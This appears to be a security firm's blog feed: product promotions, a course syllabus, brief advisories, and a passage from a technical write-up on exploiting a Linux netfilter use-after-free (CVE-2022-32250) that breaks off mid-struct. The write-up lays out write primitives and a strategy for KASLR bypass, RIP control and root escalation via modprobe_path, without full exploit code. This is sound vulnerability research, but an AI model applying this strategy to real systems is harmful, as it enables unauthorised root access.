This plague of failing to patch vulnerabilities is infesting enterprises globally and is spreading like wildfire. It seems that nearly every day brings another breach, another company forced to spend millions reacting after the fact to a threat that may have been prevented. These attacks are often successful due to unpatched systems.  Victim companies that could have been proactive and taken measures to prevent these attacks, now find themselves in the spotlight with diminished reputation, the possibility of regulatory fines, and lost revenue. 

We see this pattern far too often and want to help. Exodus Intelligence’s new EVE (Exodus Vulnerability Enrichment) platform delivers real time updates on things that your security team needs to be worried about and helps you prioritize patches with our exclusive XI score that shows you which vulnerabilities are most likely to be exploited in the wild. EVE combines insight regarding known vulnerabilities from our world class researchers with supervised machine learning analysis and carefully curated public data to make available the most actional intelligence in the quickest possible manner. 

EVE is a critical tool in the war against cyberattacks in the commercial sector, allowing companies to leverage the same Exodus data trusted by governments and agencies for more than a decade. Never let your business be put in the position of reacting to an attack, get EVE from Exodus Intelligence and be proactive rather than reactive.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world on N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

For more information, visit www.exodusintel.com or contact [email protected] for further discussion.

The post <strong>An Unpatched Vulnerability, A Substantial Liability</strong> appeared first on Exodus Intelligence.

The Death Star Needed Vulnerability Intelligence

21 March 2023 at 20:55

The Death Star Needed Vulnerability Intelligence

Darth Vader and his evil colleagues aboard the Death Star could have seriously benefited from world-class vulnerability intelligence. Luckily for the Rebel Alliance, Vader was too focused on threat intelligence alone.

If you’ve ever seen the original Star Wars story, you might recall that the evil Empire was confident with their defensive intelligence as well as their seemingly impenetrable defensive systems. Their intel notified them of every X-Wing, pilot, and droid headed in their direction. They were flush with anti-aircraft turrets, tie fighters, and lasers to attack those inbound threats. 

The Death Star was a fortress—right?

This approach to security isn’t unlike the networks and systems of many companies who have a vast amount of threat intelligence reporting on all known exploits in exceptional detail. Sometimes, though, lost in the noise of all the threats reported, there is a small opening. If exploited, that small opening can lead to a chain reaction of destruction. The Rebel Alliance attacked the one vulnerability they found—with tremendous results to show for it. 

Unfortunately, there are bad actors out there who are also looking to attack your systems, who can and will find a way to penetrate your seemingly robust defenses. Herein lies the absolute necessity of vulnerability intelligence. 

Exodus provides world-class vulnerability intelligence entrusted by government agencies and Fortune 500 companies. We have a team of world class researchers with hundreds of years of combined experience, ready to identify your organization’s vulnerabilities, even the smallest of openings matter. With every vulnerability we detect, we neutralize thousands of potential exploits.

Learn more about our intelligence offerings and consider starting a trial:

For more information, visit www.exodusintel.com  or https://info.exodusintel.com/defense-offer-lp/ to see trial offers.

The post <strong>The Death Star Needed Vulnerability Intelligence</strong> appeared first on Exodus Intelligence.

Everything Old Is New Again

15 March 2023 at 15:00

Everything Old Is New Again,
Exodus Has A Solution

It is said that those who are ignorant of history are doomed to repeat it, and this article from CSO shows that assertion reigns true in cybersecurity as well.  Threat actors are continuing to exploit vulnerabilities that have been known publicly since 2017 and earlier.  Compromised enterprises referenced in the article had five years or longer to patch or mitigate these vulnerabilities but failed to do so.  Rarely does a month go by without another article showcasing how companies are continuously compromised by patched vulnerabilities.  Why does this keep happening?

Things are hard and vulnerability management is no exception.  Many enterprises manage tens, or hundreds, of thousands of hosts, each of which may have any number of vulnerabilities at any given time.  As you may well imagine, monitoring such a vast and dynamic attack surface can be tremendously challenging.  The vulnerability state potentially changes on each host with every application installed, patch applied, and configuration modified.  Given the numbers of vulnerabilities cited in the CSO article previously mentioned, tens of thousands of vulnerabilities reported per year and increasing, how can anything short of a small army ever hope to plug these critical infrastructure holes?

If you accept that there is no reasonable way to patch or mitigate every single vulnerability then you must pivot to prioritizing vulnerabilities and managing a reasonable volume off the top, therefore minimizing risk in the context of available resources.  There are many ways to prioritize vulnerabilities, provided you have the necessary vulnerability intelligence to do so.  Filter out all vulnerabilities on platforms that do not exist in your environment.  Focus on those vulnerabilities that exist on public-facing hosts and then work inward.  As you are considering these relevant vulnerabilities, sort them by the likelihood of each being exploited in the wild.

Exodus Intelligence makes this type of vulnerability intelligence and much more available in our EVE (Exodus Vulnerability Enrichment) platform.  Input CPEs that exist within your environment into the EVE platform and see visualizations of vulnerability data that apply specifically to you.  We combine carefully curated public data with our own machine learning analysis and original research from some of the best security minds in the world and allow you to visualize and search it all.  You can also configure custom queries with results that you care about, schedule them to run on a recurring basis, and send you a notification when a vulnerability is published that meets your criteria.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world on N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

 

For more information, visit www.exodusintel.com or contact [email protected] for further discussion.

The post <strong>Everything Old Is New Again</strong> appeared first on Exodus Intelligence.

CISA Urges Caution, One Year On From Invasion of Ukraine

8 March 2023 at 16:50

CISA Urges Caution, One Year On From Invasion of Ukraine

One year removed from Russia’s invasion of Ukraine, CISA has issued a warning to the United States and its European allies: increased cyber-attacks may be headed to your network.

 As tensions abroad remain high, the cyber landscape will be an extension of the physical battleground. More than ever, understanding where and how your organization is vulnerable is an essential part of risk management.

 At Exodus Intelligence, the leader in vulnerability intelligence, we seek to proactively understand your organization’s vulnerabilities, to assess the associated risk of those vulnerabilities, and to provide focused mitigation guidance based on our expert research.

 Rather than fighting thousands of threats individually, Exodus focuses on neutralizing thousands of potential exploits all at once, by addressing the root cause of your system’s vulnerabilities.

 Be sure to follow along with CISA alerts and advisories to remain vigilant on the developing threat landscape during this turbulent time. We have extensive coverage of the vulnerabilities in CISA’s Known Exploited Vulnerabilities catalog and provide mitigation guidance on those vulnerabilities to ensure your organization stays protected.

 Learn more about our product offerings and solutions to see how we can protect your organization:

 N-Day

 Zero-Day

 EVE

The post <strong>CISA Urges Caution, One Year On From Invasion of Ukraine</strong> appeared first on Exodus Intelligence.

Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises

1 March 2023 at 16:03

Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises

Today Exodus Intelligence is excited to announce EVE (Exodus Vulnerability Enrichment), our world-class vulnerability intelligence platform. EVE allows a wide range of security operations professionals to leverage Exodus’ state-level vulnerability research. This allows those professionals to prioritize mitigation and remediation efforts, enrich event data and incidents, be alerted to new noteworthy vulnerabilities relevant to their systems, and take advantage of many other available use cases valuable in defending their critical infrastructure.

EVE makes our robust intelligence available for the first time to enterprises for use in the defense of growing cyberattacks.  The API to the Exodus body of research enables us to provide simple, out of the box integration with SIEMs, SOARs, ticketing systems and other infrastructure components that can employ contextual data.  Additionally, it enables security operations teams to develop their own custom tooling and applications and integrate our vulnerability research.

Organizations with the ability to develop automation playbooks and other tools have been able to enrich available security data, enhance investigation and incident response capabilities, prioritize vulnerability remediation efforts, and more. We can now expand that capability and visibility to the rest of the security operations team with EVE. 

EVE provides users with an intuitive interface to Exodus’ intelligence corpus made up of original research, machine learning analysis, and carefully curated public data.  This interface includes regular automated updates to intelligence data, integration with environment-specific platform and vulnerability data, interactive visualizations that operationalize the research data for SOC analysts and risk management personnel, multidimensional search capability including filters which narrow results to only vulnerabilities that exist in the user’s environment and are likely to be exploited, and the ability to schedule searches to run on a recurring basis and email alerts to the user.

EVE capabilities include:

  • Dynamic, automated intelligence feed: Vulnerability research data is updated at minimum once per day with likelihood of a vulnerability to be exploited (XI Score), mitigation guidance, and other original research combined with curated public vulnerability data to maximize visibility of the attack surface.
  • Integration with the IT ecosystem: CPE data from vulnerability scans of the infrastructure can be input into EVE and applied as context to searches and visualizations keeping focus on relevant vulnerabilities.
  • Smart data visualization: The dashboard provides a wealth of information including a real-time likelihood that an existing vulnerability will be exploited in the environment, vulnerabilities grouped and sorted by categories such as attack vector or disclosure month, and which platforms in the environment have the most vulnerabilities. All visualizations are interactive allowing the user to drill into the vulnerability details making the data actionable.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world on N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

For more information, visit www.exodusintel.com or contact [email protected] for further discussion.

The post <strong>Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises</strong> appeared first on Exodus Intelligence.

Vulnerability Assessment Course – Spring 2023

17 February 2023 at 14:27

We are pleased to announce that the researchers of Exodus Intelligence will be providing publicly available training in person on March 28 2023 in Austin, TX.

The intermediate course, titled the Vulnerability Assessment Class, covers a wide range of vulnerability and exploitation related topics and is intended for the beginner to intermediate level practitioner. This course is intended to prepare the student to fully defend the modern enterprise by being aware and equipped to assess the impact of vulnerabilities across the breadth of the application space.

Attendees should plan to travel and arrive prior to Tuesday, March 28th. The course work will conclude on Friday, March 31st, 2023.

Seating is limited. Since this training will be in person, there are a limited number of seats available.

**Later this year we will also be offering an updated version of our popular Vulnerability Development Master Class. This course will cover advanced topics such as dynamic reverse engineering, kernel exploitation concepts, browser exploitation, mitigation bypasses, and other topics. Later this year we will also be offering our Mobile Vulnerability Exploitation Class. This class will cover advanced topics concerning mobile platforms.

Vulnerability Assessment Class

This 4 day course is designed to provide students with a comprehensive and progressive approach to understanding vulnerability and exploitation topics on both the Linux and Windows platforms. Attendees will be immersed in hands-on exercises that impart valuable skills including a deep dive into the various types of vulnerabilities exploited today, static and dynamic reverse engineering, vulnerability discovery, and exploitation of widely deployed server and client-side applications. This class will cover a lot of material and move very quickly.

Prerequisites

      • Computer with ability to run a virtual machines (recommended 16GB+ memory)

      • Some familiarity with debuggers, Python, C/C++, x86 ASM. IDA Pro or Ghidra experience a plus.

    • No prior vulnerability discovery experience is necessary

    Pricing and Registration

    The cost for the 4-day course is $4000 USD per student. You may register and pay below, or you can e-mail [email protected] to register and we will supply a purchase order.

     

    Syllabus

    Vulnerability and risk assessment

    • NDay risk and patching timelines
    • Vulnerability terminology: CVE, CVSS, CWE, Mitre Attack, Impact, Category
    • Risk assessment
    • Vulnerability mitigation

    Web-based vulnerabilities

    • Basics of HTTP
      • Format of HTTP request and response, URI
      • Command Injection and Directory Traversal attacks
      • Cross-site scripting and cross-site request forgery
    • XML External Entity attacks
    • Request Smuggling
    • SQL Injection
    • Deserialization

    Modules include examples of affected CVEs and practicals.

    Binary exploitation

    • Basics of binaries
      • Platformns: Linux and Windows
      • x86 assembly, PE, and ELF formats
      • Stack, Heap, Dynamic modules
      • PIE, ASLR, DEP
    • Tools
      • Ghidra, WinDBG, and gdb
    • Stack buffer overflow
      • OS/Theme: Linux
      • Return to shellcode, Return to libc, Stack pivot, etc.
      • Linux-based practical and demo
    • Use after free
      • OS/Theme: Windows
      • Overview of NT Heap, LFH
      • Practical and demo

    The post Vulnerability Assessment Course – Spring 2023 appeared first on Exodus Intelligence.

    Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).

    15 February 2023 at 02:23

    Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).

    Exodus Intelligence, the leader in Vulnerability Research, today announced it has been authorized by the CVE Program as a CVE Numbering Authority (CNA).  As a CNA, Exodus is authorized to assign CVE IDs to newly discovered vulnerabilities and publicly disclose information about these vulnerabilities through CVE Records.

    “Exodus is proud to be authorized as a CVE Numbering Authority which will allow us to work even more closely with the security community in identifying critically exploitable vulnerabilities,” said Logan Brown, Founder and CEO of Exodus.

    The CVE Program is sponsored by the Cybersecurity and Infrastructure Security Agency (CISA), of the U.S. Department of Homeland Security (DHS) in close collaboration with international industry, academic, and government stakeholders. It is an international, community-based effort with a mission to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. The mission of CVE is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. The discovered vulnerabilities are then assigned and published to the CVE List, which feeds the U.S. National Vulnerability Database (NVD). Exodus joins a global list of 269 trusted partners across 35 countries committed to strengthening the global cyber security community through discovering and sharing valuable cyber intelligence.

    About Exodus Intelligence

    Exodus employs some of the world’s most advanced reverse engineers and exploit developers to provide Government and Enterprise the unique ability to understand, prepare, and defend against the ever-changing landscape of Cyber Security. By providing customers with actionable Vulnerability Intelligence including deep vulnerability analysis, detection and mitigation guidance, and tooling to test defenses, our customers receive leading edge insights to harden their network or achieve mission success.

    The post <strong>Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).</strong> appeared first on Exodus Intelligence.

    All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year 

    19 January 2023 at 15:13

    All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year

    As 2023 fires up, so do the attrition numbers across the Cybersecurity vertical.  With bonuses being paid and cybersecurity professionals searching for the next great job, vulnerability management teams are understaffed with growing concerns around finding qualified cybersecurity candidates to fill once occupied roles.  To amplify the situation, 2023 looks to be the year of ‘economic uncertainty’, sparking layoffs and budget contractions as companies brace for a potential recession.  These compounding factors put already overworked vulnerability management teams behind the curve as malicious threats become more frequent and more sophisticated. 

    Exodus Intelligence is here to help. 

    In response to the soaring attrition numbers and lack of qualified talent, Exodus Intelligence wants to help in making vulnerability management teams more efficient.  Exodus is offering their N-Day vulnerability subscription for FREE for 1 month for all users registered no later than January 31st.  Exodus brings 300+ years of vulnerability research expertise and the trust of governments and Fortune 500 organizations to mitigate the most critical vulnerabilities in existence. Simply put – you receive 35 world-class reserachers at no cost. 

    The N-Day Vulnerability subscription provides customers with intelligence about critically exploitable, publicly disclosed vulnerabilities on widely used software, hardware, embedded devices, and industrial control systems.  Every vulnerability is analyzed, documented, and enriched with high-impact intelligence derived by some of the best reverse engineers in the world. At times, vendor patches fail to properly secure the underlying vulnerability.  Exodus Intelligence’s proprietary research enhances patch management efforts. Subscribed customers have access to an arsenal of more than 1200 vulnerability intelligence packages to ensure defensive measures are properly implemented. 

    For those that are concerned about Zero-day vulnerabilities, Exodus is also offering the benefit of our Zero-day vulnerability subscription for up to 50% off for new registrations no later than January 31st.  Exodus’ Zero-day Subscription provides customers with critically exploitable vulnerability reports, unknown to the public, affecting widely used and relied upon software, hardware, embedded devices, and industrial control systems. Customers will gain access to a proprietary library of over 200 Zero-day vulnerability reports in addition to proof of concept exploits and highly enriched vulnerability intelligence packages. These Zero-day Vulnerability Intelligence packages, unavailable anywhere else, enable customers to reduce their mean time to detect and mitigate critically exploitable vulnerabilities. 

    These offerings are available to the United States (and allied countries) Private and Public Sectors to gain the immediate benefit of advanced vulnerability analysis, mitigation guidance/signatures, and proof-of-concepts to test against current defenses. 

    To register for FREE N-day Intelligence, please fill out the webform here 

    Sample Report

    The post <strong>All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year</strong>  appeared first on Exodus Intelligence.

    CloudLinux LVE kernel module (kmod-lve) Reference Counter Overflow

    13 January 2023 at 22:38

    EIP-ad32d249

    A local privilege escalation vulnerability exists in the CloudLinux Lightweight Virtualized Environment (LVE) kernel module due to an overflow of a reference counter. Successful exploitation allows an authenticated local user to escalate their privileges to root, whereas an unsuccessful exploit may cause a kernel panic. 

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-ad32d249
    • MITRE: CVE-2022-0492

    Vulnerability Metrics

    • CVSSv2 Score: 6.6

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: April 21st, 2022
    • Disclosed to public: January 13th, 2023

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post CloudLinux LVE kernel module (kmod-lve) Reference Counter Overflow appeared first on Exodus Intelligence.

    SonicWall SMA 500v and SMA 100 Series Firmware Heap Buffer Overflow

    12 January 2023 at 20:51

    EIP-6a6472ab

    A remote code execution vulnerability exists in SonicWall SMA 100 Series and SMA 500v Series due to a heap buffer overflow in the ‘extensionsetting’ endpoint. A remote, authenticated attacker can send crafted HTTP POST requests to execute code on vulnerable targets as the ‘nobody’ user.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-6a6472ab
    • MITRE: CVE-2022-2915

    Vulnerability Metrics

    • CVSSv2 Score: 6.0

    Vendor References

    Discovery Credit

    • Sergi Martinez (Exodus Intelligence)

    Disclosure Timeline

    • Disclosed to affected vendor: April 21st, 2022
    • Disclosed to public: January 12th, 2023

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post SonicWall SMA 500v and SMA 100 Series Firmware Heap Buffer Overflow appeared first on Exodus Intelligence.

    Schneider Electric SoMachine HVAC ActiveX Control Information Disclosure Vulnerability

    12 January 2023 at 20:39

    EIP-50a1e402

    An information disclosure vulnerability exists in Schneider Electric SoMachine HVAC due to a method in the ‘AxEditGrid3.ocx’ ActiveX control leaking a heap address of an ActiveX object. An attacker can entice a user to open a specially crafted web page to leak Internet Explorer process memory information.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-50a1e402
    • MITRE: CVE-2022-2988

    Vulnerability Metrics

    • CVSSv2 Score: 5.0

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: January 12th, 2023

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post Schneider Electric SoMachine HVAC ActiveX Control Information Disclosure Vulnerability appeared first on Exodus Intelligence.

    Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

    19 December 2022 at 15:14

    By Sergi Martinez

    Overview

    It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.

    The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targetting the Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.

    The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the GFP_KERNEL flag or the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-* slab caches. In version 5.15, allocations performed with the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-cg-* slab caches. While in both 5.13 and 5.15 the affected object, nft_expr, is allocated using GFP_KERNEL, the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (struct msg_msg), is served from kmalloc-* in 5.13 but from kmalloc-cg-* in 5.15. Therefore, in 5.15, struct msg_msg cannot be used to exploit this vulnerability.

    In 5.18.1, the object involved in the use-after-free vulnerability, nft_expr, is itself allocated with GFP_KERNEL_ACCOUNT in the kmalloc-cg-* slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with  GFP_KERNEL, they do not work against the latest vulnerable version of the Linux kernel.

    The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.

    Vulnerability

    Netfilter sets can be created with a maximum of two associated expressions that have the NFT_EXPR_STATEFUL flag. The vulnerability occurs when a set is created with an associated expression that does not have the NFT_EXPR_STATEFUL flag, such as the dynset and lookup expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.

    During the allocation of the associated dynset or lookup expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the NFT_EXPR_STATEFUL flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.

    Exploitation

    Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability: nft_setnft_exprnft_lookup, and nft_dynset.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L502
    
    struct nft_set {
            struct list_head           list;                 /*     0    16 */
            struct list_head           bindings;             /*    16    16 */
            struct nft_table *         table;                /*    32     8 */
            possible_net_t             net;                  /*    40     8 */
            char *                     name;                 /*    48     8 */
            u64                        handle;               /*    56     8 */
            /* --- cacheline 1 boundary (64 bytes) --- */
            u32                        ktype;                /*    64     4 */
            u32                        dtype;                /*    68     4 */
            u32                        objtype;              /*    72     4 */
            u32                        size;                 /*    76     4 */
            u8                         field_len[16];        /*    80    16 */
            u8                         field_count;          /*    96     1 */
    
            /* XXX 3 bytes hole, try to pack */
    
            u32                        use;                  /*   100     4 */
            atomic_t                   nelems;               /*   104     4 */
            u32                        ndeact;               /*   108     4 */
            u64                        timeout;              /*   112     8 */
            u32                        gc_int;               /*   120     4 */
            u16                        policy;               /*   124     2 */
            u16                        udlen;                /*   126     2 */
            /* --- cacheline 2 boundary (128 bytes) --- */
            unsigned char *            udata;                /*   128     8 */
    
            /* XXX 56 bytes hole, try to pack */
    
            /* --- cacheline 3 boundary (192 bytes) --- */
            const struct nft_set_ops  * ops __attribute__((__aligned__(64))); /*   192     8 */
            u16                        flags:14;             /*   200: 0  2 */
            u16                        genmask:2;            /*   200:14  2 */
            u8                         klen;                 /*   202     1 */
            u8                         dlen;                 /*   203     1 */
            u8                         num_exprs;            /*   204     1 */
    
            /* XXX 3 bytes hole, try to pack */
    
            struct nft_expr *          exprs[2];             /*   208    16 */
            struct list_head           catchall_list;        /*   224    16 */
            unsigned char              data[] __attribute__((__aligned__(8))); /*   240     0 */
    
            /* size: 256, cachelines: 4, members: 29 */
            /* sum members: 176, holes: 3, sum holes: 62 */
            /* sum bitfield members: 16 bits (2 bytes) */
            /* padding: 16 */
            /* forced alignments: 2, forced holes: 1, sum forced holes: 56 */
    } __attribute__((__aligned__(64)));

    The nft_set structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L347
    
    /**
     *	struct nft_expr - nf_tables expression
     *
     *	@ops: expression ops
     *	@data: expression private data
     */
    struct nft_expr {
    	const struct nft_expr_ops	*ops;
    	unsigned char			data[]
    		__attribute__((aligned(__alignof__(u64))));
    };

    The nft_expr structure is a generic container for expressions. The specific expression data is stored within its data member. For this particular vulnerability the relevant expressions are nft_lookup and nft_dynset, which are used to perform lookups on sets or update dynamic sets respectively.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_lookup.c#L18
    
    struct nft_lookup {
            struct nft_set *           set;                  /*     0     8 */
            u8                         sreg;                 /*     8     1 */
            u8                         dreg;                 /*     9     1 */
            bool                       invert;               /*    10     1 */
    
            /* XXX 5 bytes hole, try to pack */
    
            struct nft_set_binding     binding;              /*    16    32 */
    
            /* XXX last struct has 4 bytes of padding */
    
            /* size: 48, cachelines: 1, members: 5 */
            /* sum members: 43, holes: 1, sum holes: 5 */
            /* paddings: 1, sum paddings: 4 */
            /* last cacheline: 48 bytes */
    };

    nft_lookup expressions have to be bound to a given set on which the lookup operations are performed.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_dynset.c#L15
    
    struct nft_dynset {
            struct nft_set *           set;                  /*     0     8 */
            struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */
    
            /* XXX last struct has 1 byte of padding */
    
            enum nft_dynset_ops        op:8;                 /*    20: 0  4 */
    
            /* Bitfield combined with next fields */
    
            u8                         sreg_key;             /*    21     1 */
            u8                         sreg_data;            /*    22     1 */
            bool                       invert;               /*    23     1 */
            bool                       expr;                 /*    24     1 */
            u8                         num_exprs;            /*    25     1 */
    
            /* XXX 6 bytes hole, try to pack */
    
            u64                        timeout;              /*    32     8 */
            struct nft_expr *          expr_array[2];        /*    40    16 */
            struct nft_set_binding     binding;              /*    56    32 */
    
            /* XXX last struct has 4 bytes of padding */
    
            /* size: 88, cachelines: 2, members: 11 */
            /* sum members: 81, holes: 1, sum holes: 6 */
            /* sum bitfield members: 8 bits (1 bytes) */
            /* paddings: 2, sum paddings: 5 */
            /* last cacheline: 24 bytes */
    };

    nft_dynset expressions have to be bound to a given set on which the add, delete, or update operations will be performed.

    When a given nft_set has expressions bound to it, they are added to the nft_set.bindings double linked list. A visual representation of an nft_set with 2 expressions is shown in the diagram below.

    The binding member of the nft_lookup and nft_dynset expressions is defined as follows:

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576
    
    /**
     *	struct nft_set_binding - nf_tables set binding
     *
     *	@list: set bindings list node
     *	@chain: chain containing the rule bound to the set
     *	@flags: set action flags
     *
     *	A set binding contains all information necessary for validation
     *	of new elements added to a bound set.
     */
    struct nft_set_binding {
    	struct list_head		list;
    	const struct nft_chain		*chain;
    	u32				flags;
    };

    The important member in our case is the list member. It is of type struct list_head, the same as the nft_lookup.binding and nft_dynset.binding members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.

    With this information, let’s see what the vulnerability allows to do. Since the UAF occurs within a double linked list let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is build with the nft_set and the expressions that can be bound to it.

    In the diagram shown above, the simplified pseudo-code for removing the nft_lookup expression from the list would be:

    nft_lookup.binding.list->prev->next = nft_lookup.binding.list->next
    nft_lookup.binding.list->next->prev = nft_lookup.binding.list->prev

    This code effectively writes the address of nft_dynset.binding in nft_set.bindings.next, and the address of nft_set.bindings in nft_dynset.binding.list->prev. Since the binding member of nft_lookup and nft_dynset expressions are defined at different offsets, the write operation is done at different offsets.

    With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:

    • nft_lookup: Write an 8-byte address at offset 24 (binding.list->next) or offset 32 (binding.list->prev) of a freed nft_lookup object.
    • nft_dynset: Write an 8-byte address at offset 64 (binding.list->next) or offset 72 (binding.list->prev) of a freed nft_dynset object.

    The offsets mentioned above take into account the fact that nft_lookup and nft_dynset expressions are bundled in the data member of an nft_expr object (the data member is at offset 8).

    In order to do something useful with the limited write primitves that the vulnerability offers we need to find objects allocated within the same slab caches as the nft_lookup and nft_dynset expression objects that have an interesting member at the listed offsets.

    As mentioned before, in Linux kernel 5.18.1 the nft_expr objects are allocated using the GFP_KERNEL_ACCOUNT flag, as shown below.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nf_tables_api.c#L2866
    
    static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
    				      const struct nlattr *nla)
    {
    	struct nft_expr_info expr_info;
    	struct nft_expr *expr;
    	struct module *owner;
    	int err;
    
    	err = nf_tables_expr_parse(ctx, nla, &expr_info);
    	if (err < 0)
                goto err1;
            err = -ENOMEM;
    
            expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);
    	if (expr == NULL)
    	    goto err2;
    
    	err = nf_tables_newexpr(ctx, &expr_info, expr);
    	if (err < 0)
                goto err3;
    
            return expr;
    err3:
            kfree(expr);
    err2:
            owner = expr_info.ops->type->owner;
    	if (expr_info.ops->type->release_ops)
    	    expr_info.ops->type->release_ops(expr_info.ops);
    
    	module_put(owner);
    err1:
    	return ERR_PTR(err);
    }

    Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targetting version 5.13 and 5.15.

    Exploit Strategy

    The ultimate primitives we need to exploit this vulnerability are the following:

    • Memory leak primitive: Mainly to defeat KASLR.
    • RIP control primitive: To achieve kernel code execution and escalate privileges.

    However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the nft_setnft_lookup or the nft_dynset objects.

    Partially freeing nft_lookup and nft_dynset objects can help with leaking pointers, while partially freeing an nft_set object can be pretty useful to craft a partial fake nft_set to achieve RIP control, since it has an ops member that points to a function table.

    Therefore, the high-level exploitation strategy would be the following:

    1. Leak the kernel image base address.
    2. Leak a pointer to an nft_set object.
    3. Obtain RIP control.
    4. Escalate privileges by overwriting the kernel’s MODPROBE_PATH global variable.
    5. Return execution to userland and drop a root shell.

    The following sub-sections describe how this can be achieved.

    Partial Object Free Primitive

    A partial object free primitive can be built by looking for a kernel object allocated with GFP_KERNEL_ACCOUNT within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, kfree() has to be called on that pointer in order to partially free the targeted object.

    One of such objects is the fdtable object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27
    
    struct fdtable {
            unsigned int               max_fds;              /*     0     4 */
    
            /* XXX 4 bytes hole, try to pack */
    
            struct file * *            fd;                   /*     8     8 */
            long unsigned int *        close_on_exec;        /*    16     8 */
